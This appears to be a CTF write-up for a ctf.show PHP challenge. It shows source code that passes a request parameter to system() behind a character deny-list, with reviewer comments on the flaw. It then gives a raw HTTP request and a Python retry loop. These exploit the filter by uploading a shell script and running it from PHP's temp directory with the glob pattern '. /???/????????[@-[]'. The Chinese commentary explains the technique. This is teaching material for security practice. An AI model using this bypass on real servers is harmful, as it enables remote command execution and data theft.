<?php
/*
 # -*- coding: utf-8 -*-
 # @Author: Lazzaro
 # @Date: 2020-09-05 20:49:30
 # @Last Modified by: h1xa
 # @Last Modified time: 2020-09-07 22:02:47
 # @email: h1xa@ctfer.com
 # @link: https://ctfer.com
*/
// Are you all showing off?
//
// Reviewer note: the request parameter c reaches system() guarded only by a
// deny-list regex. The pattern (with /i) rejects ';', letters, digits, '$',
// '(', '{', single and double quotes, backticks, '%', tab (\x09), '&' (\x26),
// '>' and '<'; every byte not on that list is handed to the shell verbatim.
// A deny-list is not a trust boundary for shell input. The fix is to stop
// passing request data to system() altogether, or to map c onto a fixed
// allow-list of commands and build each argument with escapeshellarg().
// Also, '!preg_match(...)' treats the engine's false (error) return the same
// as "no match", so a failed check fails open; compare with '=== 0' instead.
if (isset($_GET['c'])) {
    $c = $_GET['c'];
    // preg_match() returns 0 when none of the listed bytes is present, which
    // is the only condition under which the command below runs.
    if (!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)) {
        system($c);
    }
} else {
    // No c parameter: print this file's own source.
    highlight_file(__FILE__);
}
POST /?c=.%20/???/????????[@-[] HTTP/1.1 Host: 38e01fc6-12c1-4003-a799-dc74d8c479d8.challenge.ctf.show User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=----geckoformboundary98c4d6bac442abbefe0684638924813d Content-Length: 348 Origin: null Connection: close Upgrade-Insecure-Requests: 1 Priority: u=0, i------geckoformboundary98c4d6bac442abbefe0684638924813d Content-Disposition: form-data; name="file"; filename="exp.txt" Content-Type: text/plain#!/bin/sh cat flag.php ------geckoformboundary98c4d6bac442abbefe0684638924813d Content-Disposition: form-data; name="submit"鎻愪氦 ------geckoformboundary98c4d6bac442abbefe0684638924813d--
使用上题后部分的方式
这里甚至把数字都给过滤掉了，还有部分的特殊字符。这里看南神博客，南神原话：“这次在上一题的基础上多过滤掉了数字，导致我们无法使用上题的payload。
不过之前看过p师傅的一篇无字母数字webshell的文章，这里我们可以利用php的特性：如果我们发送一个上传文件的post包，php会将我们上传的文件保存在临时的文件夹下，并且默认的文件目录是/tmp/phpxxxxxx。文件名最后的6个字符是随机的大小写字母，而且最后一个字符大概率是大写字母。容易想到的匹配方式就是利用?进行匹配，即???/?????????，然而这不一定会匹配到我们上传的文件，这时候有什么办法呢？
发现可以用[]来正则匹配，如???/?????????[A-Z]就能匹配B-Y，于是为了匹配A-Z就可以从@匹配到[。然后这里有个技巧是使用 . 来执行文件，如创建了一个 a.txt，然后里面写ls，在shell里执行 . a.txt，就会执行出ls的结果。于是构造如下：
# Exploit driver from the writeup, kept exactly as extracted: the statements were
# collapsed onto one line, so it is not runnable in this form.
# Reviewer note: the loop re-sends the same multipart upload until the response
# body contains "ctf"; there is no attempt cap and no delay between tries (the
# only exit is the break on success). On the defending side, the observable
# signature is a multipart file upload arriving at an endpoint whose query string
# carries a command-like "c" parameter, repeated at high rate from one client.
import requests while True:url = 'http://617464c5-1e4b-4cd8-9ef1-adbb89037d3c.challenge.ctf.show/? c=. /???/????????[@-[]' flag = requests.post(url=url,files={"file":("flag.txt","cat flag.php")} )if("ctf" in flag.text):print(flag.text)break